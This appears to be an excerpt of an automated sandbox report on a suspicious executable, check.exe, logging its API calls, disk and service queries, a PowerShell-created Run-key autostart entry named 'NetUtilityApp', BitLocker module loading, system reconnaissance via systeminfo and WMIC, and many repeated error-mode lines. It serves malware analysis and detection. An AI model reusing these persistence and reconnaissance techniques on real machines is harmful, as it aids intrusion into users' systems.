Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i	16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i	16_2_00007FFB9DD62B00

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD68B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,

16_2_00007FFB9DD68B10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E8E5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

4_2_00007FF61E8E5830

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
